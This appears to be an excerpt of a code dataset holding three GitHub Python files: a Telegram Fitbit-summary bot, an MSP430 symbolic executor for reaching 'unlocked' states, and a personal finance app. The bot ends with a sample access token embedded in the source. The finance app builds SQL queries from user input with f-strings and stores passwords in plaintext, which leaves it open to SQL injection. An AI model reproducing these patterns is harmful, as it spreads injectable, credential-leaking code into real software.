TinyDB(\"db.json\")\r\ndb_query = Query()\r\n\r\n\r\n# insert user in database\r\ndef insert_user(update):\r\n user = get_user(update)\r\n if user is not None and len(db.search(db_query.id == user.id)) == 0:\r\n db.insert({'id': user.id, 'first_name': user.first_name, 'last_name': user.last_name})\r\n logging.info(f\"{user.id} added to database\")\r\n\r\n# search database for user\r\ndef search_user(update):\r\n user = get_user(update)\r\n return db.search(db_query.id == user.id)[0]\r\n\r\n#get chat id\r\ndef get_chat_id(update, context):\r\n chat_id = -1\r\n\r\n if update.message is not None:\r\n chat_id = update.message.chat.id\r\n elif update.callback_query is not None:\r\n chat_id = update.callback_query.message.chat.id\r\n elif update.poll is not None:\r\n chat_id = context.bot_data[update.poll.id]\r\n\r\n return chat_id\r\n\r\n#get user information\r\ndef get_user(update):\r\n user: User = None\r\n\r\n _from = None\r\n\r\n if update.message is not None:\r\n _from = update.message.from_user\r\n elif update.callback_query is not None:\r\n _from = update.callback_query.from_user\r\n\r\n if _from is not None:\r\n user = User()\r\n user.id = _from.id\r\n user.username = _from.username if _from.username is not None else \"\"\r\n user.first_name = _from.first_name if _from.first_name is not None else \"\"\r\n user.last_name = _from.last_name if _from.last_name is not None else \"\"\r\n user.lang = _from.language_code if _from.language_code is not None else \"n/a\"\r\n return user\r\n\r\ndef start_command_handler(update, context):\r\n \"\"\"Send a message when the command /start is issued.\"\"\"\r\n insert_user(update)\r\n user = search_user(update)\r\n update.message.reply_text(f\"Hi {user['first_name']}! I'm a IndHealth, thanks for joining !!!!\")\r\n update.message.reply_text(\"I'm here to help you with your health summary\")\r\n update.message.reply_text(\"Please type /help for more information\")\r\n update.message.reply_text(\"\\n\\nTo get started, please type app name for example for fitbit /app fitbit and for xiomi /app xiomi\")\r\n\r\n\r\ndef add_app_type(update, context):\r\n app_name = get_text_from_message(update).split(\" \")[1]\r\n add_typing(update, context)\r\n\r\n if app_name == \"fitbit\" or app_name == \"xiomi\":\r\n user = search_user(update)\r\n db.update({'app_name': app_name}, db_query.id==user['id'])\r\n add_text_message(update, context, f\"You selected app type {app_name}\")\r\n\r\n url = call_authorization_url()\r\n add_text_message(update, context, f\"Please enter your access token and user id after authenticating from {url}\")\r\n else:\r\n add_text_message(update, context, \"Please select a valid app type\")\r\n\r\ndef add_access_token(update, context):\r\n access_token = get_text_from_message(update).split(\" \")[1]\r\n user = search_user(update)\r\n db.update({'access_token': access_token}, db_query.id==user['id'])\r\n add_typing(update, context)\r\n add_text_message(update, context, f\"Your access token is stored with us\")\r\n\r\ndef add_user_id(update, context):\r\n user_id = get_text_from_message(update).split(\" \")[1]\r\n user = search_user(update)\r\n db.update({'user_id': user_id}, db_query.id==user['id'])\r\n add_typing(update, context)\r\n add_text_message(update, context, f\"Your user id is stored with us\")\r\n\r\n\r\ndef get_today_running_steps(update, context):\r\n user = search_user(update)\r\n today_steps = get_walking_data(user['access_token'], user['user_id'])\r\n add_typing(update, context)\r\n if not today_steps==False:\r\n add_text_message(update, context, f\"Today you have run {today_steps} steps\")\r\n logging.info(f\"User {user['id']} has run {today_steps} steps\")\r\n else:\r\n add_text_message(update, context, f\"Error while getting data\")\r\n logging.info(f\"Error while getting data for user {user['id']}\")\r\n\r\ndef get_7d_weight_log(update, context):\r\n user = search_user(update)\r\n weight_7d = get_weight_log(user['access_token'], user['user_id'])\r\n add_typing(update, context)\r\n if not weight_7d==False:\r\n weight_7d_string = \"\"\r\n for i in weight_7d:\r\n weight_7d_string += i + \", \"\r\n add_text_message(update, context, f\"Your body weight over the last 7 days were {weight_7d_string}\")\r\n logging.info(f\"User {user['id']} body weight over the last 7 days were {weight_7d_string}\")\r\n else:\r\n add_text_message(update, context, f\"Error while getting data\")\r\n logging.info(f\"Error while getting data for user {user['id']}\")\r\n\r\n\r\ndef get_7d_weight_vis(update, context):\r\n user = search_user(update)\r\n weight_7d = get_weight_log(user['access_token'], user['user_id'])\r\n\r\n last_7d_dates = [] \r\n today = datetime.date.today()\r\n for i in range(0,7):\r\n last_7d_dates.append(today - datetime.timedelta(days=i))\r\n\r\n sample = [1,2,3,4,5,6,7]\r\n\r\n add_typing(update, context)\r\n if not weight_7d==False:\r\n weight_7d_list = []\r\n for i in weight_7d:\r\n weight_7d_list.append(float(i))\r\n \r\n plt.figure(figsize=(16, 6))\r\n plt.plot(last_7d_dates, weight_7d_list) # create figure & 1 axis\r\n plt.ylabel('Weight')\r\n plt.xlabel('Date')\r\n plt.savefig(\"name.png\")\r\n ans = subprocess.check_output(['postimg', 'name.png', '--html'])\r\n ans = ans.decode('utf-8')\r\n index_start = ans.index(\"https://\")\r\n index_end = ans.index(\"png\")\r\n index_end = index_end + 3\r\n img_link = ans[index_start:index_end]\r\n\r\n print(\"Generated and forwarded the Visualiation\", img_link) \r\n add_text_message(update, context, f\"Here is your body weight data for the last 7 days\")\r\n add_text_message(update, context, f\"Visualization Link: {img_link}\")\r\n\r\n\r\n # logging.info(f\"User {user['id']} body weight over the last 7 days were {weight_7d_list}\")\r\n else:\r\n add_text_message(update, context, f\"Error while getting data\")\r\n logging.info(f\"Error while getting data for user {user['id']}\")\r\n\r\n\r\n\r\n\r\n\r\ndef help_command_handler(update, context):\r\n \"\"\"Send a message when the command /help is issued.\"\"\"\r\n update.message.reply_text(\"Type /start\")\r\n\r\ndef new_member(update, context):\r\n logging.info(f\"new_member : {update}\")\r\n add_typing(update, context)\r\n add_text_message(update, context, f\"New user\")\r\n\r\ndef main_handler(update, context):\r\n if update.message is not None:\r\n add_typing(update, context)\r\n add_text_message(update, context, f\"Not a valid command\")\r\n\r\n\r\ndef add_typing(update, context):\r\n context.bot.send_chat_action(\r\n chat_id=get_chat_id(update, context),\r\n action=telegram.ChatAction.TYPING,\r\n timeout=1,\r\n )\r\n time.sleep(1)\r\n\r\ndef add_text_message(update, context, message):\r\n context.bot.send_message(chat_id=get_chat_id(update, context), text=message)\r\n\r\ndef add_suggested_actions(update, context, response):\r\n options = []\r\n\r\n for item in response.items:\r\n options.append(InlineKeyboardButton(item, callback_data=item))\r\n\r\n reply_markup = InlineKeyboardMarkup([options])\r\n\r\n context.bot.send_message(\r\n chat_id=get_chat_id(update, context),\r\n text=response.message,\r\n reply_markup=reply_markup,\r\n )\r\n\r\n\r\ndef get_text_from_message(update):\r\n return update.message.text\r\n\r\ndef get_text_from_callback(update):\r\n return update.callback_query.data\r\n\r\ndef error(update, context):\r\n \"\"\"Log Errors caused by Updates.\"\"\"\r\n logging.warning('Update \"%s\" ', update)\r\n logging.exception(context.error)\r\n\r\n\r\ndef main():\r\n updater = Updater(DefaultConfig.TELEGRAM_TOKEN, use_context=True)\r\n\r\n dp = updater.dispatcher\r\n\r\n # command handlers\r\n dp.add_handler(CommandHandler(\"help\", help_command_handler))\r\n dp.add_handler(CommandHandler(\"start\", start_command_handler))\r\n\r\n # app command handlers\r\n dp.add_handler(CommandHandler(\"app\", add_app_type))\r\n dp.add_handler(CommandHandler(\"access_token\", add_access_token))\r\n dp.add_handler(CommandHandler(\"user_id\", add_user_id))\r\n\r\n # summary command handlers\r\n dp.add_handler(CommandHandler(\"today_steps\", get_today_running_steps))\r\n\r\n dp.add_handler(CommandHandler(\"weight_logs\", get_7d_weight_log))\r\n dp.add_handler(CommandHandler(\"weight_logs_graph\", get_7d_weight_vis))\r\n\r\n\r\n # message handler\r\n dp.add_handler(MessageHandler(Filters.text, main_handler))\r\n\r\n dp.add_handler(MessageHandler(Filters.status_update.new_chat_members, new_member))\r\n\r\n # suggested_actions_handler\r\n dp.add_handler(\r\n CallbackQueryHandler(main_handler, pass_chat_data=True, pass_user_data=True)\r\n )\r\n\r\n # log all errors\r\n dp.add_error_handler(error)\r\n\r\n # Start the Bot\r\n if DefaultConfig.MODE == \"webhook\":\r\n\r\n updater.start_webhook(\r\n listen=\"0.0.0.0\",\r\n port=int(DefaultConfig.PORT),\r\n url_path=DefaultConfig.TELEGRAM_TOKEN,\r\n )\r\n updater.bot.setWebhook(DefaultConfig.WEBHOOK_URL + DefaultConfig.TELEGRAM_TOKEN)\r\n\r\n logging.info(f\"Start webhook mode on port {DefaultConfig.PORT}\")\r\n else:\r\n updater.start_polling()\r\n logging.info(f\"Start polling mode\")\r\n\r\n updater.idle()\r\n\r\n\r\nclass DefaultConfig:\r\n PORT = int(os.environ.get(\"PORT\", 3978))\r\n TELEGRAM_TOKEN = os.environ.get(\"TELEGRAM_TOKEN\", \"\")\r\n MODE = os.environ.get(\"MODE\", \"polling\")\r\n WEBHOOK_URL = os.environ.get(\"WEBHOOK_URL\", \"\")\r\n\r\n LOG_LEVEL = os.environ.get(\"LOG_LEVEL\", \"INFO\").upper()\r\n\r\n @staticmethod\r\n def init_logging():\r\n logging.basicConfig(\r\n format=\"%(asctime)s - %(levelname)s - %(message)s\",\r\n level=DefaultConfig.LOG_LEVEL,\r\n )\r\n\r\n\r\nif __name__ == \"__main__\":\r\n ascii_banner = pyfiglet.figlet_format(\"IndHealthBot\")\r\n print(ascii_banner) \r\n\r\n # Enable logging\r\n DefaultConfig.init_logging()\r\n\r\n #start server\r\n main()\r\n\r\n\"\"\"\r\nSample Tokens\r\n\r\naccess_token = \r\neyJhbGciOiJIUzI1NiJ9.eyJhdWQiOiIyMzgyWkMiLCJzdWIiOiI5UURNTlEiLCJpc3MiOiJGaXRiaXQiLCJ0eXAiOiJhY2Nlc3NfdG9rZW4iLCJzY29wZXMiOiJyc29jIHJzZXQgcmFjdCBybG9jIHJ3ZWkgcmhyIHJwcm8gcm51dCByc2xlIiwiZXhwIjoxNjQwMTE4NjY0LCJpYXQiOjE2Mzk1NTg5OTF9.NeLoWtkiOeXOaKjsdl7_8xps89wuORliVf-EuyOZSAY\r\nuser_id = \r\n9QDMNQ\r\n\r\n\"\"\"","repo_name":"anmolkr186/IndHealth","sub_path":"telegram_bot.py","file_name":"telegram_bot.py","file_ext":"py","file_size_in_byte":10895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32457199767","text":"from copy import copy\nimport random\nimport z3\n\nfrom .code import decode_instruction, Opcode, AddressingMode, Register\nfrom .memory import Memory, parse_mc_memory_dump\nfrom .cpu import CPU\nfrom .symio import IO, IOKind\n\nclass Path:\n \"\"\"\n The path predicate through the program.\n\n Call .add() to add a condition to the path\n\n Call .pred() to get a predicate suitable for Z3\n\n Call .clone() to get a copy-on-write version of the path\n \"\"\"\n def __init__(self, paths=None):\n if paths is None:\n self._path = []\n else:\n self._path = paths\n self.__needs_copying = False\n self.model = None\n self._model_cache = {}\n self.sat = None # unknown\n\n def add(self, condition):\n \"\"\"\n Add a condition to this path\n \"\"\"\n if self.__needs_copying:\n self._path = copy(self._path)\n self.__needs_copying = False\n self._path.append(condition)\n self.model = None\n self.sat = None\n\n def make_unsat(self):\n \"\"\"\n Helper function to make this state unsat\n \"\"\"\n self.add(False)\n\n def pred(self):\n \"\"\"\n Get the predicate for this path, suitable to throw at Z3\n \"\"\"\n # Cache the predicate, as testing has found this gives\n # a 3-4x improvement to execution speed\n pred = z3.And(*self._path)\n # simplifying here makes things a bit (~5-10%) faster...\n # strange that Z3 doesn't do that internally\n pred = z3.simplify(pred)\n self._path = [pred]\n self.__needs_copying = False\n return pred\n\n def is_sat(self):\n # if we've cached whether we're sat, just return that\n if self.sat is not None:\n return self.sat\n # if we're in the global cache, use that\n if self.pred() in self._model_cache:\n self.sat, self.model = self._model_cache[self.pred()]\n return self.sat\n solver = z3.Solver()\n solver.add(self.pred())\n is_sat = solver.check() == z3.sat\n self.sat = is_sat\n if is_sat:\n self.model = solver.model()\n\n # Save sat results back to global cache\n self._model_cache[self.pred()] = (self.sat, self.model)\n\n return is_sat\n\n def clone(self):\n new_path = Path(self._path)\n new_path.__needs_copying = True\n self.__needs_copying = True\n # pass along our model so sat checks quick-exit as long as nothing is added\n new_path.model = self.model\n new_path.sat = self.sat\n\n new_path._model_cache = self._model_cache # NOT A COPY -- GLOBAL CACHE\n return new_path\n\n def __repr__(self):\n return 'Path({})'.format(self._path)\n\n\nclass State:\n \"\"\"\n Entire encapsulation of the current state of the machine (register, memory),\n plus all the interrupts (and their associated summary functions)\n \"\"\"\n def __init__(self, cpu, memory, path, sym_input, sym_output, unlocked, ticks=0):\n self.cpu = cpu\n self.memory = memory\n self.path = path\n self.sym_input = sym_input\n self.sym_output = sym_output\n self.unlocked = unlocked\n self.ticks = ticks\n\n def step(self, enable_unsound_optimizations=True):\n \"\"\"\n Tick the cpu forward one instruction.\n\n Returns a list of successor states.\n \"\"\"\n instruction_pointer = self.cpu.registers[Register.R0]\n if z3.is_bv(instruction_pointer):\n instruction_pointer = z3.simplify(instruction_pointer).as_long()\n# pull enough to encode any instruction\n raw_instruction = \\\n self.memory[instruction_pointer : instruction_pointer + 6]\n instruction, instruction_length = \\\n decode_instruction(instruction_pointer, raw_instruction)\n #print(instruction, instruction_length)\n\n step_functions = {\n Opcode.RRC: self.cpu.step_rrc,\n Opcode.SWPB: self.cpu.step_swpb,\n Opcode.RRA: self.cpu.step_rra,\n Opcode.SXT: self.cpu.step_sxt,\n Opcode.PUSH: self.cpu.step_push,\n Opcode.CALL: self.cpu.step_call,\n Opcode.RETI: self.cpu.step_reti,\n Opcode.JNZ: self.cpu.step_jnz,\n Opcode.JZ: self.cpu.step_jz,\n Opcode.JNC: self.cpu.step_jnc,\n Opcode.JC: self.cpu.step_jc,\n Opcode.JN: self.cpu.step_jn,\n Opcode.JGE: self.cpu.step_jge,\n Opcode.JL: self.cpu.step_jl,\n Opcode.JMP: self.cpu.step_jmp,\n Opcode.MOV: self.cpu.step_mov,\n Opcode.ADD: self.cpu.step_add,\n Opcode.ADDC: self.cpu.step_addc,\n Opcode.SUBC: self.cpu.step_subc,\n Opcode.SUB: self.cpu.step_sub,\n Opcode.CMP: self.cpu.step_cmp,\n Opcode.DADD: self.cpu.step_dadd,\n Opcode.BIT: self.cpu.step_bit,\n Opcode.BIC: self.cpu.step_bic,\n Opcode.BIS: self.cpu.step_bis,\n Opcode.XOR: self.cpu.step_xor,\n Opcode.AND: self.cpu.step_and,\n }\n self.cpu.registers[Register.R0] += instruction_length # preincrement ip\n instruction_fn = step_functions[instruction.opcode]\n successor_states = instruction_fn(self, instruction, \\\n enable_unsound_optimizations=enable_unsound_optimizations)\n return successor_states\n\n def clone(self):\n return self.__class__(self.cpu.clone(), self.memory.clone(), self.path.clone(), self.sym_input.clone(), self.sym_output.clone(), self.unlocked, self.ticks+1)\n\n def has_symbolic_ip(self):\n ip = self.cpu.registers[Register.R0]\n return z3.is_bv(ip) and not isinstance(z3.simplify(ip), z3.BitVecNumRef)\n\n def decode_some_instructions(self, ip, n):\n \"\"\"\n Decodes **up to** :n: instructions, starting at :ip:\n\n Stops at ret instructions\n \"\"\"\n\n # ret == mov @sp+, pc, so we have to do this huge thing\n is_ret = lambda insn: insn.opcode == Opcode.RETI or \\\n (insn.opcode == Opcode.MOV and \\\n insn.source_addressing_mode == AddressingMode.AUTOINCREMENT and \\\n insn.source_register == Register.R1 and \\\n insn.dest_register == Register.R0)\n\n instructions = []\n for _ in range(n):\n raw_instruction = self.memory[ip : ip + 6]\n instruction, instruction_length = \\\n decode_instruction(ip, raw_instruction)\n \n instructions.append(instruction)\n ip += instruction_length\n # stop analyzing on ret since we don't know what\n # could be past there (end of memory, random data)\n if is_ret(instruction):\n break\n return instructions\n\n\nclass PathGroup:\n def __init__(self, active, avoid=None):\n self.active = set(active)\n self.unlocked = set() # states with the lock unlocked\n self.unsat = set()\n self.symbolic = set() # paths with symbolic control data\n self.recently_added = set()\n self.tick_count = 0\n if isinstance(avoid, int):\n avoid = (avoid,) # wrap int avoid in a tuple\n self.avoid = avoid\n\n def prune(self):\n \"\"\"\n Move any unsat states in this PathGroup that are in the active set to\n the unsat set\n \"\"\"\n sat_states = set()\n symbolic_states = set()\n unlocked_states = set()\n unsat_states = set()\n for state in self.active:\n\n if state.path.is_sat():\n if state.has_symbolic_ip():\n symbolic_states.add(state)\n\n if state.unlocked:\n unlocked_states.add(state)\n else:\n sat_states.add(state)\n else:\n #print('Marking state unsat:', state, state.path._path[-1])\n unsat_states.add(state)\n\n self.active = set(sat_states)\n self.unsat.update(unsat_states)\n self.unlocked.update(unlocked_states)\n self.symbolic.update(symbolic_states)\n\n def select_next_state(self):\n \"\"\"\n Select the next state to simulate from the active group, removing it\n from that group\n \"\"\"\n # TODO: more effective strategies?\n if len(self.active) > 64:\n choice = max(self.active, key=lambda st: st.ticks)\n else:\n choice = min(self.active, key=lambda st: st.ticks)\n self.active.discard(choice)\n return choice\n\n def step(self, enable_unsound_optimizations=True):\n path_to_sim = self.select_next_state()\n successors = set(path_to_sim.step(enable_unsound_optimizations=enable_unsound_optimizations))\n self.active.update(successors)\n self.recently_added = successors\n self.tick_count += 1\n\n for state in successors:\n # make states at an avoid_addr unsat\n # TODO: maybe check recent states?\n if self.avoid:\n def simplify(v):\n if z3.is_bv(v):\n v = z3.simplify(v).as_long()\n return v\n try:\n ip = simplify(state.cpu.registers[Register.R0])\n if ip in self.avoid:\n state.path.make_unsat()\n except AttributeError:\n pass # symbolic ip!! Ignore for now...\n\n self.prune() # prune unsat successors\n\n def step_until_symbolic_ip(self, enable_unsound_optimizations=True, debug_print=False):\n while self.active and not self.symbolic:\n self.step(enable_unsound_optimizations=enable_unsound_optimizations)\n print('==== Steps: {} == Active: {} == Unsat: {} ===='.format(self.tick_count, len(self.active), len(self.unsat)))\n if debug_print:\n for state in self.active:\n ip = state.cpu.registers['R0']\n if z3.is_bv(ip):\n ip = z3.simplify(ip).as_long()\n print('\\t', state)\n print('\\t\\tIP:', hex(ip))\n print('\\t\\tInput:', [x.rstrip(b'\\xc0') for x in state.sym_input.dump(state)])\n print('\\t\\tOutput:', repr(state.sym_output.dump(state)))\n\n\n def step_until_unlocked(self, enable_unsound_optimizations=True, debug_print=False):\n while self.active and not self.unlocked:\n self.step(enable_unsound_optimizations=enable_unsound_optimizations)\n print('==== Steps: {} == Active: {} == Unsat: {} ===='.format(self.tick_count, len(self.active), len(self.unsat)))\n if debug_print:\n for state in self.active:\n ip = state.cpu.registers['R0']\n if z3.is_bv(ip):\n ip = z3.simplify(ip).as_long()\n print('\\t', state)\n print('\\t\\tIP:', hex(ip))\n print('\\t\\tInput:', repr(state.sym_input.dump(state).rstrip(b'\\xc0')))\n print('\\t\\tOutput:', repr(state.sym_output.dump(state)))\n\n\n\ndef start_path_group(memory_dump, start_ip, avoid=None):\n \"\"\"\n Parse a memory dump, construct a base state, and return a PathGroup.\n \"\"\"\n mem = parse_mc_memory_dump(memory_dump)\n cpu = CPU()\n cpu.registers[Register.R0] = z3.BitVecVal(start_ip, 16)\n path = Path()\n inp = IO(IOKind.INPUT, [])\n out = IO(IOKind.OUTPUT, [])\n\n\n entry_state = State(cpu, mem, path, inp, out, False)\n pg = PathGroup([entry_state], avoid=avoid)\n return pg\n\n# shared instance of the backing memory so we don't need to keep building this\n# make sure blank_state returns a clone of it's state so we don't accidentally\n# reuse this instance!!\n__memory_data = [z3.BitVecVal(0, 8) for _ in range(0xFFFF)]\ndef blank_state():\n cpu = CPU()\n memory = Memory(__memory_data)\n path = Path()\n inp = IO(IOKind.INPUT, [])\n out = IO(IOKind.OUTPUT, [])\n # return a clone because we cache __memory_data\n return State(cpu, memory, path, inp, out, False).clone()\n","repo_name":"Hypersonic/msp430_symex","sub_path":"msp430_symex/state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":12107,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"54"} +{"seq_id":"72470894882","text":"# <------------------------ Imports ------------------------------> #\nfrom matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\nimport numpy as np\nimport tkinter as tk\n\n# <--- MySQL Errors ---> #\nimport mysql.connector.errors as SQLErrors\n\n# <--- Miscellenaeous ---> #\nfrom typing import *\nimport csv\nimport datetime\nimport sys\n\n# <--- Self-Defined stuff ---> #\nfrom __init__ import conn, start_connection\nfrom funcs import *\n\n# <--- Matplotlib and PyPlot ---> #\nimport matplotlib.pyplot as plt\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\n\n# <--- PySimpleGUI ---> #\nif sys.version >= \"3.0.0\":\n import PySimpleGUI as sg\n from PySimpleGUI import Window, T, Input, Button, Popup, PopupError, Submit, TabGroup, Tab, Multiline, Combo, CalendarButton, Table, PopupYesNo, Canvas\nelse:\n import PySimpleGUI27 as sg\n from PySimpleGUI27 import Window, T, Input, Button, Popup, PopupError, Submit, TabGroup, Tab, Multiline, Combo, CalendarButton, Table, PopupYesNo, Canvas\n\n# <------------------------- Useful Stuff ---------------------------------> #\n\n# tooltips = [\n# 'Log a new transaction',\n# 'Quickly jot down transactions and make calculations. Export them to a csv file',\n# 'View graphs of your expenditure and income history',\n# 'See all of your transactions'\n# ]\n\ngraph_active = False\n\nheading_format = {\n \"justification\": 'center',\n \"size\": (20, 1),\n \"font\": (\"Segoe\", 20)\n}\n\nyear = datetime.datetime.now().year\nmonth = datetime.datetime.now().month\nday = datetime.datetime.now().day\n\nmonths = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun',\n 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']\n\nmonths_30 = ['Apr', 'Jun', 'Sep', 'Nov']\nmonths_31 = [month for month in months if month !=\n 'Feb' and month not in months_30]\nmonth_name = months[month-1]\ndays_in_month = 30 if month_name in months_30 else 31 if month_name in months_31 else 28\n# <----------------------- MySQL -----------------------------> #\n\n'''\n __ __ ____ ___ _\n | \\/ |_ _/ ___| / _ \\| |\n | |\\/| | | | \\___ \\| | | | |\n | | | | |_| |___) | |_| | |___\n |_| |_|\\__, |____/ \\__\\_\\_____|\n |___/\n\nHere below lie all the MySQL related functions.\nQueries, connectivity (actually in __init__.py, though), cursors, everything's here.\n'''\n\nstart_connection() # Starts MySQL Database\n\n\ndef check_login_info(User: str, Pass: str) -> bool:\n cursor = conn.cursor()\n\n try:\n cursor.execute(f\"\"\"\n SELECT username, passwd\n FROM users\n WHERE username = '{User}' AND passwd = '{Pass}';\n \"\"\")\n\n result = cursor.fetchone()\n if result not in [[], None, [()]]:\n return True\n\n else:\n return False\n\n except ConnectionError:\n Popup(\"Error Connecting to Database.\",\n \"Please try again or restart the program\")\n except SQLErrors.ProgrammingError:\n PopupError(\"ERROR: Invalid credentials.\", \"Try again\")\n cursor.close()\n\n\ndef create_account(u: Union[str, int], p: Union[str, int], e: Union[str, int], f: str, l: str) -> None:\n cursor = conn.cursor()\n\n e = 'NULL' if e in (None, '') else e\n\n try:\n '''\n Creates a new entry in the db.\n Required two cases as the email field is optional\n '''\n if e != 'NULL':\n cursor.execute(f\"\"\"\n INSERT INTO users (username,passwd,email_id,first_name,last_name)\n VALUES ('{u}','{p}','{e}','{f}','{l}');\n \"\"\")\n else:\n cursor.execute(f\"\"\"\n INSERT INTO users (username,passwd,email_id,first_name,last_name)\n VALUES ('{u}','{p}',{e},'{f}','{l}');\n \"\"\")\n\n conn.commit()\n\n except ConnectionError:\n Popup(\"Error Connecting to Database.\",\n \"Please try again or restart the program\")\n\n cursor.close()\n\n\ndef get_income_and_expense(user: str) -> Tuple[float, float]:\n cursor = conn.cursor()\n cursor.execute(f\"\"\"\n SELECT SUM(amount)\n FROM transactions\n WHERE\n exp_date BETWEEN '{year}-{month}-01' AND '{year}-{month}-{days_in_month}'\n AND exp_type = 'CR'\n AND username = '{user}';\"\"\")\n\n try:\n income = cursor.fetchone()[0]\n if income == None:\n income = 0\n except TypeError:\n print(\"No records found. Setting income to None\")\n income = None\n\n cursor.execute(f\"\"\"\n SELECT SUM(amount)\n FROM transactions\n WHERE\n exp_date BETWEEN '{year}-{month}-01' AND '{year}-{month}-{days_in_month}'\n AND exp_type = 'DR'\n AND username = '{user}';\"\"\")\n\n try:\n expense = cursor.fetchone()[0]\n if expense == None:\n expense = 0\n\n except TypeError:\n print(\"No records found. Setting expense to None\")\n expense = None\n\n cursor.close()\n\n return (income, expense)\n\n\ndef get_user_details(user: str) -> List[str]:\n cursor = conn.cursor()\n\n cursor.execute(f\"\"\"\n SELECT user_id,username,passwd,email_id,first_name,last_name\n FROM users\n WHERE username = '{user}';\n \"\"\")\n\n user_details = cursor.fetchall()[0]\n\n cursor.close()\n\n return user_details\n\n\ndef username_used(user: str) -> bool:\n cursor = conn.cursor()\n\n cursor.execute(f\"\"\"\n SELECT COUNT(username) FROM users\n WHERE username = '{user}';\n \"\"\")\n\n user_count = cursor.fetchone()[0]\n print(f\"No. of users with username {user} = {user_count}\")\n if user_count != 0:\n return True\n else:\n return False\n\n\ndef get_transactions(user: Union[str, int],\n n: int = 10000,\n start_date: str = f\"{year}-{month}-1\",\n end_date: str = f\"{year}-{month}-{day}\",\n asc_or_desc: str = \"ASC\",\n orderer: str = \"particulars\") -> List[Tuple]:\n headings = [\n \"Particulars\",\n \"Type\",\n \"Amount\",\n \"Date\"\n ]\n\n cursor = conn.cursor()\n\n where_clause_part_1 = f\"username = '{user}'\" if type(\n user) is str else f\"user_id = {user}\"\n where_clause = where_clause_part_1 + f\"\"\"\n AND\n exp_date BETWEEN '{start_date}' AND '{end_date}'\n ORDER BY {orderer} {asc_or_desc}\n \"\"\"\n\n # <------------ Counts number of transactions falling into the requirements and returns them to the slider ----------------> #\n query = f\"\"\"\n SELECT COUNT(*)\n FROM transactions\n WHERE {where_clause};\n \"\"\"\n cursor.execute(query)\n\n number_of_records = cursor.fetchone()[0]\n\n cursor.reset()\n\n query = f\"\"\"\n SELECT particulars,exp_type,amount,exp_date\n FROM transactions\n WHERE {where_clause}\n \"\"\"\n\n if number_of_records < n:\n limit = f\" LIMIT {number_of_records};\"\n else:\n limit = f\" LIMIT {n};\"\n\n cursor.execute(query+limit)\n\n transactions: List[Tuple] = cursor.fetchall()\n print(transactions)\n trans_table = Table(transactions, headings, key=\"table\", right_click_menu=[\"Options\", [\n \"Edit\", \"Delete\"]], enable_events=True) if number_of_records != 0 else Table([\"No records to display\"], headings=[\" \"*50], key=\"table\")\n\n return transactions, trans_table, number_of_records\n\n\n# <-------------------- PyPlot -------------------------> #\ndef get_graph_values(start_date: str = f\"{year}-{month}-1\",\n end_date: str = f\"{year}-{month}-{day}\",\n exp_type: str = \"All\"\n ):\n\n global graph_active\n\n cursor = conn.cursor()\n q_cr = f\"\"\"\n SELECT particulars,amount,DAY(exp_date)\n FROM transactions\n WHERE\n exp_date BETWEEN \"{start_date}\" AND \"{end_date}\"\n AND exp_type = \"CR\"\n ORDER BY exp_date;\n \"\"\"\n\n q_dr = f\"\"\"\n SELECT particulars,amount,DAY(exp_date)\n FROM transactions\n WHERE\n exp_date BETWEEN \"{start_date}\" AND \"{end_date}\"\n AND exp_type = \"DR\"\n ORDER BY exp_date;\n \"\"\"\n\n def plot_graphs():\n if exp_type == 'Credit':\n q = q_cr\n elif exp_type == 'Debit':\n q = q_dr\n elif exp_type == 'All':\n q1 = q_cr\n q2 = q_dr\n \n x = np.arange(1, days_in_month)\n\n plt.xticks(np.arange(1,days_in_month+1),range(1,days_in_month+1))\n\n if exp_type in (\"Credit\", \"Debit\"):\n cursor.execute(q)\n points = cursor.fetchall()\n \n x = np.array([point[2] for point in points])\n y = np.array([point[1] for point in points])\n \n plt.plot(x, y, marker = \"o\",label=exp_type)\n\n plt.grid(True)\n else:\n # <------- Credit -------> #\n cursor.execute(q1)\n points_1 = cursor.fetchall()\n x1 = np.array([point[2] for point in points_1]) # Dates\n y1 = np.array([point[1] for point in points_1]) # Amount\n\n cursor.reset()\n\n # <------- Debit -------> #\n cursor.execute(q2)\n points_2 = cursor.fetchall()\n\n x2 = np.array([point[2] for point in points_2])\n y2 = np.array([point[1] for point in points_2])\n\n plt.plot(x1, y1, marker=\"o\", label=\"Credit\")\n plt.plot(x2, y2, marker=\"x\", label=\"Debit\")\n\n plt.grid(True)\n\n plt.title(f\"Report for the month of {month_name}-{year}\")\n plt.legend()\n\n fig = plt.gcf() # gcf -> get current figure #\n fig_x, fig_y, fig_w, fig_h = fig.bbox.bounds\n return fig, fig_w, fig_h\n # q_all = f\"\"\"\n # SELECT particulars,amount,DAY(exp_date) \n # FROM transactions \n # WHERE \n # exp_date BETWEEN \"{start_date}\" AND \"{end_date}\" \n # ORDER BY exp_date;\n # \"\"\"\n if not graph_active:\n return plot_graphs()\n\n else:\n # plt.clf()\n\n return plot_graphs()\n # graph_active = True\n\n cursor.close()\n\n# <------------------------------- Beginning of Matplotlib helper code -----------------------> #\n# <----- Taken from https://github.com/PySimpleGUI/PySimpleGUI/blob/master/DemoPrograms/Demo_Matplotlib.py -----> #\n\n\ndef draw_figure(canvas, figure, loc=(0, 0)):\n figure_canvas_agg = FigureCanvasTkAgg(figure, canvas)\n figure_canvas_agg.draw()\n figure_canvas_agg.get_tk_widget().pack(side='top', fill='both', expand=1)\n return figure_canvas_agg\n\n\ndef delete_figure_agg(figure_agg):\n figure_agg.get_tk_widget().forget()\n plt.close('all')\n\n# <----------------------- GUI -----------------------------> #\n\n# ________ ___ ___ ___\n# |\\ ____\\|\\ \\|\\ \\|\\ \\\n# \\ \\ \\___|\\ \\ \\\\\\ \\ \\ \\\n# \\ \\ \\ __\\ \\ \\\\\\ \\ \\ \\\n# \\ \\ \\|\\ \\ \\ \\\\\\ \\ \\ \\\n# \\ \\_______\\ \\_______\\ \\__\\\n# \\|_______|\\|_______|\\|__|\n\n\n'''\nWhy am I using a class to store all my GUI functions?\n\n-> So that I could use locally created values like vals and user_details within other functions\n and to prevent me from getting a headache while managing scopes.\n\nNo, seriously though, making an object really helps while handling local objects as globals, making the programming\nenjoyable and painless.\n'''\n\n\nclass Xpnsit:\n \n 